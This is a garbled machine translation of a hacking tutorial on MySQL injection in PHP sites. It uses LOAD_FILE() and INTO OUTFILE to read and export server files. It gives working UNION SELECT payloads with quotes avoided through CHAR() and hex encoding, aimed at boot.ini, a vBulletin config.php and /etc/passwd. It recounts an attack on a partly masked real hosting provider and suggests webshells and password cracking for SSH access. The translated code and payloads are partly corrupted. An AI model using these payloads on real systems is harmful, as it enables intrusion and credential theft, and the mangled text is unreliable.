My previous article has been more comprehensive in the injection of MySQL, but there is a function of harmful, I have not mentioned in the text, because if this function can be flexibly applied, the PHP or even the security of the server Will be a big discount, due to the "SQL Injection with MySQL" published time during the summer vacation, taking into account many newers, students and morally corrupted people, I didn't write this in this article, in fact, this article has been in early May Write. After the topic, many people have turned to PHP MySQL injection research, and many new technologies will be excavated, and we have mastered the unusless senior skills will be announced. As for the relatively basic thing, this article is no longer mentioned.
detailed
We know that in the SQL statement, we can use a variety of mysql built-in functions, often use Database (), user (), system_user (), session_user (), current_user () these functions to get some system information, There is a more than a function, which is load_file (), which is the function of reading the file and returns the file content as a string.
Seeing this, you should think of what we can do, just read some confidential documents, but it is also conditional restrictions:
To read files must be on the server
Must specify the full path
There must be permission to read and the file must be readable.
Want to read the file must be smaller than max_allowed_packet
If the file does not exist, or because any of the above reasons cannot be read, the function returns empty. More difficult is permission, under Windows, if the NTFS is set properly, you cannot read the relevant file, when you encounter the file that only Administrators can access, users don't want to go out. In actual injection, we have two difficulties to solve:
Absolute physical path
Construct effective deformity statement
In many PHP programs, when submitting a wrong Query, if display_errors = on, the program exposes the absolute path of the web directory, as long as the path is known, then for a PHP program that can be injected, the security of the entire server will be severely Threat. The constructing statement is already small.
use
We assume that the SQL statement of a program is as follows:
Select * from article where articleid = $ ID
Note: Current conditions: Magic_quotes_GPC = OFF, C: /Boot.ini is readable.
At this point, we construct $ ID as:
-1 Union SELECT 1, 1, 1, 1, LOAD_FILE ('c: /boot.ini')
Our Query becomes:
Select * from article where articleid = -1 Union SELECT 1, 1, 1, 1, loading_file ('c: /boot.ini')
The program will showcase C: /Boot.ini content, but now Magic_QUOTES_GPC = Off has fewer hosts, how can I construct a statement without quotation marks? Friends who have seen "SQL INJECTION with MySQL" must know that with a char () function or convert the character into 16, it is true, that is, it.
Note: Current conditions: magic_quotes_gpc = ON, C: /Boot.ini is readable.
We construct $ ID for:
-1 Union SELECT 1, 1, 1, LOAD_FILE (CHAR (99, 58, 47, 98, 111, 105)) "CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)" is "c: /boot.ini" ASCII Code, our query is turning:
Select * from article where articleid = -1 Union SELECT 1, 1, 1, LOAD_FILE (CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105))
We can also read the boot.ini files in successful, and the 16-based 16-based "0x633A2F626F6F742E696E69" is "0x633A2F626F6F742E696E69", so the statement above can be like this:
Select * from article where articleid = -1 Union SELECT 1, 1, 1, LOAD_FILE (0x633a2f626f6f742e696e69)
It's a short time, see people like it, you can enter the following query in phpmyadmin or mysql> slowly study.
SELECT LOAD_FILE ([String])
Of course, in practical applications, due to various conditions, the content of the document will not be displayed, and we can also export files with INTO OUTFILE. Everyone has known how to use it, I don't say a detail, see an instance explains everything.
Example
Www. *** Host.cn is the famous FreeBSD host provider in my country, and we will take him to test, because it uses the VBB Forum for Calendar.php, I don't need to find everywhere.
The site of the vulnerability (although it is everywhere). This is a complete safety test. Just get information, I didn't enter the server.
Here, additional explanation of a piece of code on the Global.php of the VBB, as follows:
// Get Rid of Slashes in Get / Post / Cook
IE Data
Function stri
PslashesArray (& $ arr) {
While (List ($ KEY, $ VAL) = Each ($ arr)) {
IF ($ Key! = "Templatesused" and $ key! = "argc" and $ key! = "argv") {
IF (is_string ($ val) and (strtoupper ($ key)! = $ key or ("", ".intval ($ key)
== "$ key"))) {
$ Arr ["$ key"] = stripslashes ($ VAL);
} else IF (is_ARRAY ($ key == 'http_post_vars' or $ key
== 'http_get_vars' or start ($ key)! = $ Key)) {
$ arr ["$ key"] = stripslasheser ($ VAL);
}
}
}
Return $ ARR;
}
IF (GET_MAGIC_QUOTES_GPC () and is_ARRAY ($ global)) {
IF (isset ($ attachment)) {
$ Glals ['attachment'] = addslashes ($ globals ['attachment']);
IF (isset ($ avatarfile) {
$ Globals ['avatarfile'] = addslashes ($ globals ['avatarfile']);
}
$ Globals = stripslasheser ($ global);
}
SET_MAGIC_QUOTES_RUNTIME (0);
The role of this code is that if Magic_QUOTES_GPC is opened, you remove the front escape character of all special characters, so no matter how the Magic_QUOTES_GPC in php.ini, the single quotes we entered have no effect, you can inject it. Ha ha.
We know, submit:
/calendar.php?action=edit 1, 1, 1, 1, usrname, Pass
Word from User Where Userid = 1
It is possible to get the username and password MD5 hash, but due to special reasons, there is no display, but depending on my experience, know that there is no configuration, so we can read and export into files.
Because in advance I inadvertently access the file containing PHPinfo (), I know the absolute path of the web, from the access site, find one
The download system generates an HTML file. If that directory does not write permissions, you can't generate an HTML file, but all this is not the focus of this article, we now master the following information:
Web absolute path: / home / 4ngel
Can write directory path: / home / 4Ngel / Soft /
Magic_quotes_GPC = ON
Compared with the host root, the forum is nothing, I am not interested in the forum admin, we have to read the Forum configuration files and / etc / passwd, know the mysql connection information, you can start from here, write WebShell or other things, know / etc / passwd we can run your password. Go directly from SSH.
The configuration file of the VBB Forum is in /Home/4ngel/forum/admin/config.php, converted into ASCII code, submitted:
Calendar.php? Action = Edit & EventId = 1 Union SELECT 1, 1, 1, 1, 1, LOAD_FILE (char
(47, 104, 111, 109, 101, 47, 52, 110, 103, 101, 108, 47, 102, 111, 114, 117, 109, 47, 97, 100, 109, 105, 110, 47,
99, 111, 110, 102, 105, 103, 46, 112, 104, 112)) from user where userid = 1 INTO
Outfile '/Home/4Ngel/soft/cfg.txt'
Oh, remember to add a WHER to set a condition, otherwise, if the forum is a lot, then the exported file will be quite large. Or simply specify $ EventID as a value that does not exist, you don't have WHERE, just like this:
Calendar.php? Action = Edit & EventId = -1 Union SELECT 1, 1, 1, 1, 1, LOAD_FILE (char
(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user into outfile '/home/4ngel/soft/cfg.txt'
/ etc / passwd is converted into ASCII code, submitted:
Calendar.php? Action = Edit & EventId = -1 Union SELECT 1, 1, 1, 1, 1, LOAD_FILE (char
(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)) from User Into
Outfile '/Home/4Ngel/soft/etcpwd.txt'
Note See the top of the forum, the following error tips appear:
Warning: mysql_fetch_Array (): Supplied Argument is not a valid mysql result resource
IN /HOME/4Ngel/forum/admin/db_mysql.php on line 154
Experience tells us that the document is successful, submitted:
http://www.xxxhost.cn/soft/cfg.txt
http://www.xxxhost.cn/soft/etcpwd.txt
The content is 啦, while the night and pig eggs
When invasive gray, one by one display password, deception, login background, upload the latter, read config.php, a series of steps, I get a load_file (). Is it harmful?
